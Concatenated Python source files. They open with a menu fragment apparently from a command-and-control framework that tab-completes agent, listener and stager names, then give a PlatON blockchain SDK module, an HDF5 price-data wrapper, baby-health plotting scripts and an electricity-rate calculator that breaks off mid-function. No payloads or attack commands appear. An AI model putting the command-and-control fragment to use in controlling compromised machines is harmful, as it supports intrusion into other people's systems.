name = line.strip()
if name != "" and self.mainMenu.agents.is_agent_present(name):
# resolve the passed name to a sessionID
sessionID = self.mainMenu.agents.get_agent_id_db(name)
agent_menu = AgentMenu(self.mainMenu, sessionID)
else:
print(helpers.color("[!] Please enter a valid agent name"))
def complete_set(self, text, line, begidx, endidx):
"Tab-complete a stager option to set."
options = list(self.stager.options.keys())
if line.split(' ')[1].lower() == "listener":
# if we're tab-completing a listener name, return all the names
listenerNames = self.mainMenu.listeners.get_listener_names()
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in listenerNames if s.startswith(mline)]
elif line.split(' ')[1].lower().endswith("language"):
languages = ['powershell', 'python']
end_line = ' '.join(line.split(' ')[1:])
mline = end_line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in languages if s.startswith(mline)]
elif line.split(' ')[1].lower().endswith("path"):
# tab-complete any stager option that ends with 'path'
return helpers.complete_path(text, line, arg=True)
# otherwise we're tab-completing an option name
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_unset(self, text, line, begidx, endidx):
"Tab-complete a stager option to unset."
options = list(self.stager.options.keys()) + ["all"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.mainMenu.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
``` |
{
"source": "jiuen1115/SM-client-sdk-python",
"score": 2
} |
#### File: SM-client-sdk-python/client_sdk_python/eth.py
```python
import json
import sha3
import rlp
import copy
from client_sdk_python.packages.eth_utils.hexadecimal import remove_0x_prefix
from client_sdk_python.packages.platon_account import (
Account,
)
from client_sdk_python.packages.platon_account.internal.transactions import bech32_address_bytes
from client_sdk_python.packages.eth_utils import (
apply_to_return_value,
is_checksum_address,
is_string,
)
from hexbytes import (
HexBytes,
)
from client_sdk_python.contract import (
Contract,
)
from client_sdk_python.wasmcontract import (
WasmContract,
)
from client_sdk_python.iban import (
Iban,
)
from client_sdk_python.module import (
Module,
)
from client_sdk_python.utils.blocks import (
select_method_for_block_identifier,
)
from client_sdk_python.utils.decorators import (
deprecated_for,
deprecated_in_v5,
)
from client_sdk_python.utils.empty import (
empty,
)
from client_sdk_python.utils.encoding import (
to_hex,
)
from client_sdk_python.utils.filters import (
BlockFilter,
LogFilter,
TransactionFilter,
)
from client_sdk_python.utils.toolz import (
assoc,
merge,
)
from client_sdk_python.utils.transactions import (
assert_valid_transaction_params,
extract_valid_transaction_params,
get_buffered_gas_estimate,
get_required_transaction,
replace_transaction,
wait_for_transaction_receipt,
)
from client_sdk_python.packages.platon_account.internal.signing import (
to_standard_signature_bytes,
)
true = True
false = False
class Eth(Module):
account = Account()
defaultAccount = empty
defaultBlock = "latest"
defaultContractFactory = Contract
iban = Iban
gasPriceStrategy = None
@deprecated_for("doing nothing at all")
def enable_unaudited_features(self):
pass
def namereg(self):
raise NotImplementedError()
def icapNamereg(self):
raise NotImplementedError()
@property
def protocolVersion(self):
return self.web3.manager.request_blocking("platon_protocolVersion", [])
@property
def syncing(self):
return self.web3.manager.request_blocking("platon_syncing", [])
# @property
# def coinbase(self):
# return self.web3.manager.request_blocking("platon_coinbase", [])
# @property
# def mining(self):
# return self.web3.manager.request_blocking("platon_mining", [])
# @property
# def hashrate(self):
# return self.web3.manager.request_blocking("platon_hashrate", [])
@property
def gasPrice(self):
return self.web3.manager.request_blocking("platon_gasPrice", [])
@property
def accounts(self):
return self.web3.manager.request_blocking("platon_accounts", [])
@property
def blockNumber(self):
return self.web3.manager.request_blocking("platon_blockNumber", [])
@property
def evidences(self):
data = self.web3.manager.request_blocking("platon_evidences", [])
return json.loads(data)
@property
def consensusStatus(self):
return self.web3.manager.request_blocking("platon_consensusStatus", [])
def getPrepareQC(self, block_number):
return self.web3.manager.request_blocking("platon_getPrepareQC", [block_number])
def getBalance(self, account, block_identifier=None):
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_getBalance",
[account, block_identifier],
)
def getStorageAt(self, account, position, block_identifier=None):
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_getStorageAt",
[account, position, block_identifier]
)
def getCode(self, account, block_identifier=None):
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_getCode",
[account, block_identifier],
)
def getBlock(self, block_identifier, full_transactions=False):
"""
`platon_getBlockByHash`
`platon_getBlockByNumber`
"""
method = select_method_for_block_identifier(
block_identifier,
if_predefined='platon_getBlockByNumber',
if_hash='platon_getBlockByHash',
if_number='platon_getBlockByNumber',
)
return self.web3.manager.request_blocking(
method,
[block_identifier, full_transactions],
)
def getBlockTransactionCount(self, block_identifier):
"""
`platon_getBlockTransactionCountByHash`
`platon_getBlockTransactionCountByNumber`
"""
method = select_method_for_block_identifier(
block_identifier,
if_predefined='platon_getBlockTransactionCountByNumber',
if_hash='platon_getBlockTransactionCountByHash',
if_number='platon_getBlockTransactionCountByNumber',
)
return self.web3.manager.request_blocking(
method,
[block_identifier],
)
# def getUncleCount(self, block_identifier):
# """
# `platon_getUncleCountByBlockHash`
# `platon_getUncleCountByBlockNumber`
# """
# method = select_method_for_block_identifier(
# block_identifier,
# if_predefined='platon_getUncleCountByBlockNumber',
# if_hash='platon_getUncleCountByBlockHash',
# if_number='platon_getUncleCountByBlockNumber',
# )
# return self.web3.manager.request_blocking(
# method,
# [block_identifier],
# )
# def getUncleByBlock(self, block_identifier, uncle_index):
# """
# `platon_getUncleByBlockHashAndIndex`
# `platon_getUncleByBlockNumberAndIndex`
# """
# method = select_method_for_block_identifier(
# block_identifier,
# if_predefined='platon_getUncleByBlockNumberAndIndex',
# if_hash='platon_getUncleByBlockHashAndIndex',
# if_number='platon_getUncleByBlockNumberAndIndex',
# )
# return self.web3.manager.request_blocking(
# method,
# [block_identifier, uncle_index],
# )
def getTransaction(self, transaction_hash):
return self.web3.manager.request_blocking(
"platon_getTransactionByHash",
[transaction_hash],
)
def getRawTransaction(self, transaction_hash):
return self.web3.manager.request_blocking(
"platon_getRawTransactionByHash",
[transaction_hash],
)
@deprecated_for("w3.eth.getTransactionByBlock")
def getTransactionFromBlock(self, block_identifier, transaction_index):
"""
Alias for the method getTransactionByBlock
Depreceated to maintain naming consistency with the json-rpc API
"""
return self.getTransactionByBlock(block_identifier, transaction_index)
def getTransactionByBlock(self, block_identifier, transaction_index):
"""
`platon_getTransactionByBlockHashAndIndex`
`platon_getTransactionByBlockNumberAndIndex`
"""
method = select_method_for_block_identifier(
block_identifier,
if_predefined='platon_getTransactionByBlockNumberAndIndex',
if_hash='platon_getTransactionByBlockHashAndIndex',
if_number='platon_getTransactionByBlockNumberAndIndex',
)
return self.web3.manager.request_blocking(
method,
[block_identifier, transaction_index],
)
def waitForTransactionReceipt(self, transaction_hash, timeout=120):
return wait_for_transaction_receipt(self.web3, transaction_hash, timeout)
def getTransactionReceipt(self, transaction_hash):
return self.web3.manager.request_blocking(
"platon_getTransactionReceipt",
[transaction_hash],
)
def getTransactionCount(self, account, block_identifier=None):
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_getTransactionCount",
[
account,
block_identifier,
],
)
def replaceTransaction(self, transaction_hash, new_transaction):
current_transaction = get_required_transaction(self.web3, transaction_hash)
return replace_transaction(self.web3, current_transaction, new_transaction)
def modifyTransaction(self, transaction_hash, **transaction_params):
assert_valid_transaction_params(transaction_params)
current_transaction = get_required_transaction(self.web3, transaction_hash)
current_transaction_params = extract_valid_transaction_params(current_transaction)
new_transaction = merge(current_transaction_params, transaction_params)
return replace_transaction(self.web3, current_transaction, new_transaction)
def sendTransaction(self, transaction):
# TODO: move to middleware
if 'from' not in transaction and is_checksum_address(self.defaultAccount):
transaction = assoc(transaction, 'from', self.defaultAccount)
# TODO: move gas estimation in middleware
if 'gas' not in transaction:
transaction = assoc(
transaction,
'gas',
get_buffered_gas_estimate(self.web3, transaction),
)
return self.web3.manager.request_blocking(
"platon_sendTransaction",
[transaction],
)
def sendRawTransaction(self, raw_transaction):
return self.web3.manager.request_blocking(
"platon_sendRawTransaction",
[raw_transaction],
)
def sign(self, account, data=None, hexstr=None, text=None):
message_hex = to_hex(data, hexstr=hexstr, text=text)
return self.web3.manager.request_blocking(
"platon_sign", [account, message_hex],
)
@apply_to_return_value(HexBytes)
def call(self, transaction, block_identifier=None):
# TODO: move to middleware
if 'from' not in transaction and is_checksum_address(self.defaultAccount):
transaction = assoc(transaction, 'from', self.defaultAccount)
# TODO: move to middleware
if block_identifier is None:
block_identifier = self.defaultBlock
return self.web3.manager.request_blocking(
"platon_call",
[transaction, block_identifier],
)
def estimateGas(self, transaction):
# TODO: move to middleware
if 'from' not in transaction and is_checksum_address(self.defaultAccount):
transaction = assoc(transaction, 'from', self.defaultAccount)
return self.web3.manager.request_blocking(
"platon_estimateGas",
[transaction],
)
def filter(self, filter_params=None, filter_id=None):
if filter_id and filter_params:
raise TypeError(
"Ambiguous invocation: provide either a `filter_params` or a `filter_id` argument. "
"Both were supplied."
)
if is_string(filter_params):
if filter_params == "latest":
filter_id = self.web3.manager.request_blocking(
"platon_newBlockFilter", [],
)
return BlockFilter(self.web3, filter_id)
elif filter_params == "pending":
filter_id = self.web3.manager.request_blocking(
"platon_newPendingTransactionFilter", [],
)
return TransactionFilter(self.web3, filter_id)
else:
raise ValueError(
"The filter API only accepts the values of `pending` or "
"`latest` for string based filters"
)
elif isinstance(filter_params, dict):
_filter_id = self.web3.manager.request_blocking(
"platon_newFilter",
[filter_params],
)
return LogFilter(self.web3, _filter_id)
elif filter_id and not filter_params:
return LogFilter(self.web3, filter_id)
else:
raise TypeError("Must provide either filter_params as a string or "
"a valid filter object, or a filter_id as a string "
"or hex.")
def getFilterChanges(self, filter_id):
return self.web3.manager.request_blocking(
"platon_getFilterChanges", [filter_id],
)
def getFilterLogs(self, filter_id):
return self.web3.manager.request_blocking(
"platon_getFilterLogs", [filter_id],
)
def getLogs(self, filter_params):
return self.web3.manager.request_blocking(
"platon_getLogs", [filter_params],
)
def uninstallFilter(self, filter_id):
return self.web3.manager.request_blocking(
"platon_uninstallFilter", [filter_id],
)
def wasm_type(self,abi_data):
for i in range(len(abi_data)):
if abi_data[i]['type']=='Action':
abi_data[i]['type']='function'
if abi_data[i]['type']=='Event':
abi_data[i]['type'] = 'event'
abi_data[i]['anonymous'] = False
if len(abi_data[i]['input']) > 0:
for j in range(len(abi_data[i]['input'])):
abi_data[i]['input'][j]['indexed'] = ((j+1) <= abi_data[i]['topic'])
if abi_data[i]['type'] == 'struct':
if 'fields' in abi_data[i] and 'inputs' not in abi_data[i]:
abi_data[i]['inputs'] = abi_data[i].pop('fields')
if len(abi_data[i]['baseclass'])>0:
for j in range(len(abi_data[i]['baseclass'])):
abi_data[i]['inputs'].insert(j,{'name':abi_data[i]['baseclass'][j],'type':'struct'})
# else :
# abi_data[i]['inputs'].insert(0, {'name': abi_data[i]['baseclass'], 'type': 'struct'})
del abi_data[i]['baseclass']
if abi_data[i]['name']== 'init':
abi_data[i]['type']='constructor'
if 'input' in abi_data[i]:
abi_data[i]['inputs'] = abi_data[i].pop('input')
if 'output' in abi_data[i]:
abi_data[i]['outputs'] = {'name':"",'type':abi_data[i]['output']}
del abi_data[i]['output']
return abi_data
def contract(self,
address=None,
**kwargs):
ContractFactoryClass = kwargs.pop('ContractFactoryClass', self.defaultContractFactory)
ContractFactory = ContractFactoryClass.factory(self.web3, **kwargs)
if address:
return ContractFactory(address)
else:
return ContractFactory
def wasmcontract(self,
address=None,
**kwargs):
if 'vmtype' in kwargs:
if kwargs['vmtype'] == 1:
abi_data=copy.deepcopy(kwargs['abi'])
kwargs['abi']= self.wasm_type(abi_data)
# del kwargs['vmtype']
ContractFactoryClass = kwargs.pop('ContractFactoryClass', self.defaultContractFactory)
# 若kwargs中有'ContractFactoryClass'这个key,则返回对应的value值,若无这个key,则返回self.defaultContractFactory
ContractFactory = ContractFactoryClass.factory(self.web3, **kwargs)
if address:
return ContractFactory(address)
else:
return ContractFactory
def setContractFactory(self, contractFactory):
self.defaultContractFactory = contractFactory
# @deprecated_in_v5
# def getCompilers(self):
# return self.web3.manager.request_blocking("platon_getCompilers", [])
# def getWork(self):
# return self.web3.manager.request_blocking("platon_getWork", [])
def generateGasPrice(self, transaction_params=None):
if self.gasPriceStrategy:
return self.gasPriceStrategy(self.web3, transaction_params)
def setGasPriceStrategy(self, gas_price_strategy):
self.gasPriceStrategy = gas_price_strategy
# add to platon
def analyzeReceiptByHash(self, tx_hash):
receipt = self.waitForTransactionReceipt(tx_hash)
return self.analyzeReceipt(receipt)
def analyzeReceipt(self, transaction_receipt):
return self.web3.analyzeReceipt(transaction_receipt)
def ecrecover(self, block_identifier):
block = self.getBlock(block_identifier)
extra = block.proofOfAuthorityData[0:32]
sign = block.proofOfAuthorityData[32:]
miner = bech32_address_bytes(remove_0x_prefix(block.miner))
raw_data = [bytes.fromhex(remove_0x_prefix(block.parentHash.hex())),
miner,
bytes.fromhex(remove_0x_prefix(block.stateRoot.hex())),
bytes.fromhex(remove_0x_prefix(block.transactionsRoot.hex())),
bytes.fromhex(remove_0x_prefix(block.receiptsRoot.hex())),
bytes.fromhex(remove_0x_prefix(block.logsBloom.hex())),
block.number,
block.gasLimit,
block.gasUsed,
block.timestamp,
extra,
bytes.fromhex(remove_0x_prefix(block.nonce))
]
message_hash = sha3.keccak_256(rlp.encode(raw_data)).digest()
hash_bytes = HexBytes(message_hash)
signature_bytes = HexBytes(sign)
signature_bytes_standard = to_standard_signature_bytes(signature_bytes)
signature_obj = self.account._keys.Signature(signature_bytes=signature_bytes_standard)
return remove_0x_prefix(signature_obj.recover_public_key_from_msg_hash(hash_bytes).to_hex())
class PlatON(Eth):
pass
``` |
{
"source": "jiuen1115/vitu",
"score": 2
} |
#### File: vitu/h5/file.py
```python
import threading
import h5py
import numpy as np
ochlv_type = np.dtype(
[('timestamp', 'uint64'), ('open', 'float_'), ('high', 'float_'), ('low', 'float_'), ('close', 'float_'),
('volume', 'float_')])
class File(h5py.File):
def __init__(self, name, mode=None, driver=None,
libver=None, userblock_size=None, swmr=False,
rdcc_nslots=None, rdcc_nbytes=None, rdcc_w0=None,
track_order=None,
**kwds):
h5py.File.__init__(self, name, mode=mode, swmr=swmr, libver='latest')
# def close(self):
# pass
def destroy(self):
super().close()
def create_dataset(self, name='ohlcv', shape=None, dtype=ochlv_type, data=None):
if not self.get('ohlcv'):
super().create_dataset(name, shape=shape, dtype=dtype, data=data)
def get_create_ohlcv(self, freq):
if not self.get('ohlcv'):
if freq == '1d':
self.create_dataset(shape=(366,))
if freq == '1m':
self.create_dataset(shape=(366 * 1440,))
if freq == '5m':
self.create_dataset(shape=(366 * 288,))
if freq in ['60min','1h']:
self.create_dataset(shape=(366 * 24,))
return self.get('ohlcv')
def get_ohlcv(self):
return self.get('ohlcv')
``` |
{
"source": "jiuguangw/Agenoria",
"score": 3
} |
#### File: Agenoria/agenoria/plot_medical_charts.py
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from pandas.plotting import register_matplotlib_converters
from .parse_config import parse_json_config
from .plot_settings import format_monthly_plot, export_figure
# Settings
config = []
def plot_daycare_days(plot_object, data):
# Group and compute sum by month. BMS gives 1st of month
daycare_monthly = data['Daycare'].resample('BMS').sum()
# Plot
plot_object.plot(daycare_monthly.index, daycare_monthly)
plot_object.set_title('Number of Days in Daycare by Months')
plot_object.set_ylabel('Number of Days')
plot_object.yaxis.set_ticks(np.arange(0, 21, 2))
format_monthly_plot(plot_object, daycare_monthly.index[0],
daycare_monthly.index[-1])
def plot_days_between_vomit(plot_object, data):
# Look up vomit days and compute gaps
vomit_days = data.loc[data['Vomit'] == 1]
days_since_last_vomit = vomit_days['Date'].diff() / np.timedelta64(1, 'D')
# Plots
plot_object.plot(vomit_days['Date'], days_since_last_vomit)
plot_object.set_title('Days Since Last Vomit')
plot_object.set_xlabel('Date')
plot_object.set_ylabel('Days Since Last Vomit')
format_monthly_plot(
plot_object, vomit_days.index[0], vomit_days.index[-1])
def plot_doctor_visit_monthly(plot_object, data):
# Group and compute sum by month. BMS gives 1st of month
doctor_monthly = data['Doctor'].resample('BMS').sum()
# Plot
plot_object.plot(doctor_monthly.index, doctor_monthly)
plot_object.set_title('Total Number of Doctor Visits by Months')
plot_object.set_ylabel('Total Number of Doctor Visits')
plot_object.yaxis.set_ticks(np.arange(0, 5, 1))
format_monthly_plot(plot_object, doctor_monthly.index[0],
doctor_monthly.index[-1])
def plot_monthly_vomit(plot_object, data):
# Group and compute sum by month. BMS gives 1st of month
vomit_monthly = data['Vomit'].resample('BMS').sum()
# Plot
plot_object.plot(vomit_monthly.index, vomit_monthly)
plot_object.set_title('Total Number of Vomits by Months')
plot_object.set_ylabel('Total Number of Vomits')
format_monthly_plot(plot_object, vomit_monthly.index[0],
vomit_monthly.index[-1])
def plot_medical_charts(config_file):
register_matplotlib_converters()
# Style
sns.set(style="darkgrid")
f, axarr = plt.subplots(2, 3)
# Import configs
global config
config = parse_json_config(config_file)
# Import data
data = pd.read_csv(config['data_misc'], parse_dates=['Date'])
data.fillna(0, inplace=True)
data = data.set_index(data['Date'])
# Chart 1 - Total Vomit Per Month
plot_monthly_vomit(axarr[0, 0], data)
# Chart 2 - Days Between Vomit
plot_days_between_vomit(axarr[0, 1], data)
# Chart 3 - Days in Daycare
plot_daycare_days(axarr[0, 2], data)
# Chart 4 - Doctor Visits
plot_doctor_visit_monthly(axarr[1, 0], data)
# Export
f.subplots_adjust(wspace=0.25, hspace=0.35)
export_figure(f, config['output_dim_x'], config['output_dim_y'],
config['output_medical_charts'])
```
#### File: Agenoria/agenoria/plot_settings.py
```python
from matplotlib.dates import MonthLocator, DateFormatter
import numpy as np
import math
def enumerate_labels(date_num):
hour_labels = []
for num in range(0, 24):
label = str(num) + ':00'
hour_labels.append(label)
week_labels = []
for num in range(0, math.ceil(date_num / 7), 2):
label = str(num)
week_labels.append(label)
return hour_labels, week_labels
def format_24h_week_plot_horizontal(ax, date_num, title):
# Figure settings
TITLE_FONT_SIZE = 25
AXIS_FONT_SIZE = 15
TITLE_HEIGHT_ADJUST = 1.02
# Create the tick labels
hour_labels, week_labels = enumerate_labels(date_num)
# Set title and axis labels
ax.set_title(title, fontsize=TITLE_FONT_SIZE, y=TITLE_HEIGHT_ADJUST)
ax.set_xlabel('Age (weeks)', fontsize=AXIS_FONT_SIZE)
ax.set_ylabel('Time of Day', fontsize=AXIS_FONT_SIZE)
# Format y axis - clock time
ax.set_ylim(0, 24)
ax.yaxis.set_ticks(np.arange(0, 24, 1))
ax.set_yticklabels(hour_labels)
ax.invert_yaxis()
# Format x axis - bottom, week number
ax.set_xlim(1, date_num)
ax.xaxis.set_ticks(np.arange(1, date_num + 1, 14))
ax.set_xticklabels(week_labels)
def format_24h_week_plot_vertical(ax, date_num, title):
# Figure settings
AXIS_FONT_SIZE = 15
# Create the tick labels
hour_labels, week_labels = enumerate_labels(date_num)
# Set title and axis labels
ax.set_xlabel('Age (weeks)', fontsize=AXIS_FONT_SIZE, rotation=180)
ax.set_ylabel('Time of Day', fontsize=AXIS_FONT_SIZE)
# Format y axis - clock time
ax.set_ylim(24, 0)
ax.yaxis.set_ticks(np.arange(0, 24, 1))
ax.set_yticklabels(hour_labels, rotation=180)
ax.invert_yaxis()
# Format x axis - bottom, week number
ax.set_xlim(1, date_num)
ax.xaxis.set_ticks(np.arange(1, date_num + 1, 14))
ax.set_xticklabels(week_labels, rotation=90)
def format_growth_chart_plot(plot_object):
# Figure settings
TITLE_FONT_SIZE = 14
AXIS_FONT_SIZE = 10
# Change label sizes
plot_object.title.set_size(TITLE_FONT_SIZE)
plot_object.xaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.yaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.tick_params(labelsize=AXIS_FONT_SIZE)
def format_monthly_plot(plot_object, xlim_left, xlim_right):
# Figure settings
TITLE_FONT_SIZE = 10
AXIS_FONT_SIZE = 8
# Axis label
plot_object.set_xlabel('Date')
# Change x-axis left and right limits
plot_object.set_xlim(xlim_left, xlim_right)
plot_object.autoscale(enable=True, axis='y', tight=True)
# Change label sizes
plot_object.title.set_size(TITLE_FONT_SIZE)
plot_object.xaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.yaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.tick_params(labelsize=AXIS_FONT_SIZE)
# Change tick spacing
plot_object.set_xticks(plot_object.get_xticks()[::1])
plot_object.xaxis.set_major_locator(
MonthLocator(range(1, 13), bymonthday=1, interval=1))
plot_object.xaxis.set_major_formatter(DateFormatter("%b"))
def export_figure(figure, dim_x, dim_y, output_filename):
# Export
figure.set_size_inches(dim_x, dim_y)
figure.savefig(output_filename, bbox_inches='tight')
figure.clf()
``` |
{
"source": "jiuguangw/dte_calculator",
"score": 2
} |
#### File: jiuguangw/dte_calculator/dte_calculator.py
```python
import dte
import sys
def main():
dte.dte_calculator(sys.argv[1])
main()
```
#### File: dte_calculator/dte/dte.py
```python
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from pandas.plotting import register_matplotlib_converters
from matplotlib.dates import MonthLocator, DateFormatter
# Rate reference:
# https://newlook.dteenergy.com/wps/wcm/connect/23195474-a4d1-4d38-aa30-a4426fd3336b/WholeHouseRateOptions.pdf?MOD=AJPERES
# Residential Electric Service Rate
RES_CUTOFF = 17
RES_CAP_RATE_17KWH = 0.03705
RES_NON_CAP_RATE_17KWH = 0.04687
RES_CAP_RATE_ADDITIONAL = 0.05339
RES_NON_CAP_RATE_ADDITIONAL = 0.04687
# Time of Day Rate
TOD_SUMMER_CAP_PEAK = 0.12375
TOD_SUMMER_NON_CAP_PEAK = 0.04554
TOD_SUMMER_CAP_OFF_PEAK = 0.01145
TOD_SUMMER_NON_CAP_OFF_PEAK = 0.04554
TOD_WINTER_CAP_PEAK = 0.09747
TOD_WINTER_NON_CAP_PEAK = 0.04554
TOD_WINTER_CAP_OFF_PEAK = 0.00922
TOD_WINTER_NON_CAP_OFF_PEAK = 0.04554
# Delivery charges
RATE_SERVICE = 7.5
RATE_DISTRIBUTION_KWH = 0.06109
RATE_WASTE_REDUCTION = 0.004487
RATE_LIEAF = 0.92
RATE_NUCLEAR_SURCHARGE = 0.000827
RATE_TRANSITIONAL_RECOVERY = 0.001030
RATE_SALES_TAX = 0.06
# Sample method
SAMPLE_METHOD = 'BMS' # BMS
# US Average
US_AVERAGE = 867
# Figure settings
TITLE_FONT_SIZE = 10
AXIS_FONT_SIZE = 8
def compute_delivery_charges(kwh_monthly):
total = RATE_SERVICE
total += kwh_monthly * RATE_DISTRIBUTION_KWH
total += kwh_monthly * RATE_WASTE_REDUCTION
total += kwh_monthly * RATE_NUCLEAR_SURCHARGE
total += kwh_monthly * RATE_TRANSITIONAL_RECOVERY
total += RATE_LIEAF
return total
def compute_ToD_rate(data_raw):
# Init
data = data_raw
data['Cost_Cap'] = 0
data['Cost_NonCap'] = 0
# Weekday filter
index_weekday = data.index.weekday < 5
index_weekend = data.index.weekday >= 5
# Season filter
index_summer = np.logical_and(
data.index.month >= 6, data.index.month <= 10)
index_winter = np.logical_or(
data.index.month >= 11, data.index.month <= 5)
# Hour filter
index_peak = np.logical_and(
data.index.hour >= 11, data.index.hour <= 18, index_weekday)
index_off_peak = np.logical_or(
data.index.hour < 11, data.index.hour > 18, index_weekend)
# Combine filters
index_summer_peak = np.logical_and(index_summer, index_peak)
index_summer_off_peak = np.logical_and(index_summer, index_off_peak)
index_winter_peak = np.logical_and(index_winter, index_peak)
index_winter_off_peak = np.logical_and(index_winter, index_off_peak)
# Calculate summer, peak
summer_peak = data['Total'].loc[index_summer_peak]
data.loc[index_summer_peak, 'Cost_Cap'] = summer_peak * TOD_SUMMER_CAP_PEAK
data.loc[index_summer_peak, 'Cost_NonCap'] = summer_peak * \
TOD_SUMMER_NON_CAP_PEAK
# Calculate summer, off peak
summer_off_peak = data['Total'].loc[index_summer_off_peak]
data.loc[index_summer_off_peak, 'Cost_Cap'] = summer_off_peak * \
TOD_SUMMER_CAP_OFF_PEAK
data.loc[index_summer_off_peak, 'Cost_NonCap'] = summer_off_peak * \
TOD_SUMMER_NON_CAP_OFF_PEAK
# Calculate winter, peak
winter_peak = data['Total'].loc[index_winter_peak]
data.loc[index_winter_peak, 'Cost_Cap'] = winter_peak * \
TOD_WINTER_CAP_PEAK
data.loc[index_winter_peak, 'Cost_NonCap'] = winter_peak * \
TOD_WINTER_NON_CAP_PEAK
# Calculate winter, off peak
winter_off_peak = data['Total'].loc[index_winter_off_peak]
data.loc[index_winter_off_peak, 'Cost_Cap'] = winter_off_peak * \
TOD_WINTER_CAP_OFF_PEAK
data.loc[index_winter_off_peak, 'Cost_NonCap'] = winter_off_peak * \
TOD_WINTER_NON_CAP_OFF_PEAK
# Calculate delivery charges
kwh_monthly = data['Total'].resample(SAMPLE_METHOD).sum()
delivery_charges_monthly = compute_delivery_charges(kwh_monthly)
# Total cost
data['Total Cost'] = data['Cost_Cap'] + data['Cost_NonCap']
cost_monthly = data['Total Cost'].resample(SAMPLE_METHOD).sum()
sales_tax = cost_monthly * RATE_SALES_TAX
total = cost_monthly + delivery_charges_monthly + sales_tax
# Consumption on peak
consumption_peak = data['Total'].loc[index_peak].resample(
SAMPLE_METHOD).sum()
consumption_offpeak = data['Total'].loc[index_off_peak].resample(
SAMPLE_METHOD).sum()
return total, consumption_peak, consumption_offpeak
def compute_RES_rate(data_raw):
# Compute daily total consumption
data = data_raw['Total'].resample('D').sum().to_frame()
data['Cost_CAP_17'] = RES_CUTOFF * RES_CAP_RATE_17KWH
data['Cost_NON_CAP_17'] = RES_CUTOFF * RES_NON_CAP_RATE_17KWH
data['Cost_CAP_ADD'] = 0
data['Cost_NON_CAP_ADD'] = 0
# Filter
index = data['Total'] > RES_CUTOFF
data.loc[index, 'Cost_CAP_ADD'] = (
data['Total'] - RES_CUTOFF) * RES_CAP_RATE_ADDITIONAL
data.loc[index, 'Cost_NON_CAP_ADD'] = (
data['Total'] - RES_CUTOFF) * RES_NON_CAP_RATE_ADDITIONAL
# Compute delivery charges
kwh_monthly = data['Total'].resample(SAMPLE_METHOD).sum()
delivery_charges_monthly = compute_delivery_charges(kwh_monthly)
# Total cost
data['Total Cost'] = data['Cost_CAP_17'] + data['Cost_NON_CAP_17'] + \
data['Cost_CAP_ADD'] + data['Cost_NON_CAP_ADD']
cost_monthly = data['Total Cost'].resample(SAMPLE_METHOD).sum()
sales_tax = cost_monthly * RATE_SALES_TAX
total = cost_monthly + delivery_charges_monthly + sales_tax
return total
def format_plots(plot_object):
# Set label
plot_object.set_xlabel('Date')
# Change label sizes
plot_object.title.set_size(TITLE_FONT_SIZE)
plot_object.xaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.yaxis.label.set_size(AXIS_FONT_SIZE)
plot_object.tick_params(labelsize=AXIS_FONT_SIZE)
# Change tick spacing
plot_object.set_xticks(plot_object.get_xticks()[::1])
plot_object.xaxis.set_major_locator(
MonthLocator(range(1, 13), bymonthday=1, interval=2))
plot_object.xaxis.set_major_formatter(DateFormatter("%b"))
def dte_calculator(filename):
register_matplotlib_converters()
# Style
sns.set(style="darkgrid")
f, axarr = plt.subplots(2, 2)
# Import data
data = pd.read_csv(filename, parse_dates=[['Day', 'Hour of Day']])
data = data.set_index(data['Day_Hour of Day'])
data.index.rename('Date', inplace=True)
data.rename(columns={'Hourly Total': 'Total'}, inplace=True)
# Compute cost for the Residential Electric Service Rate
cost_monthly_res = compute_RES_rate(data)
# Compute cost for the Time of Day Service Rate
cost_monthly_ToD, consumption_peak, consumption_offpeak = compute_ToD_rate(
data)
# Compute consumption KWH by month
kwh_monthly = data['Total'].resample(SAMPLE_METHOD).sum()
# Compute savings
savings_monthly = cost_monthly_res - cost_monthly_ToD
res_total = round(cost_monthly_res.sum(), 2)
tod_total = round(cost_monthly_ToD.sum(), 2)
savings_total = round(savings_monthly.sum(), 2)
# Plot 1 - Consumption
axarr[0, 0].plot(kwh_monthly.index, kwh_monthly)
axarr[0, 0].set_title('Consumption by Month (kWh)')
axarr[0, 0].set_ylabel('Consumption (kWh)')
axarr[0, 0].axhline(US_AVERAGE, linewidth=1, color='r',
ls='--', label='US Residential Average')
axarr[0, 0].legend()
format_plots(axarr[0, 0])
# Plot 2 - Peak vs Off Peak
axarr[0, 1].plot(consumption_peak.index, consumption_peak, label='Peak')
axarr[0, 1].plot(consumption_offpeak.index,
consumption_offpeak, label='Off Peak')
axarr[0, 1].set_title('Consumption by Month, Peak vs Off Peak')
axarr[0, 1].set_ylabel('Consumption (kWh)')
axarr[0, 1].legend()
format_plots(axarr[0, 1])
# Plot 3 - Services
axarr[1, 0].plot(cost_monthly_res.index, cost_monthly_res,
label='Standard RES Service')
axarr[1, 0].plot(cost_monthly_ToD.index,
cost_monthly_ToD, label='Time of Day Service')
axarr[1, 0].set_title('Total Cost by Month')
axarr[1, 0].set_ylabel('Cost in US Dollars')
axarr[1, 0].legend()
format_plots(axarr[1, 0])
# Plot 4 - Savings
axarr[1, 1].plot(cost_monthly_ToD.index, savings_monthly)
axarr[1, 1].set_title('Total Savings by Month')
axarr[1, 1].set_ylabel('Cost in US Dollars')
plt.text(0.45, 0.9, "RES Total: $" + str(res_total),
transform=axarr[1, 1].transAxes)
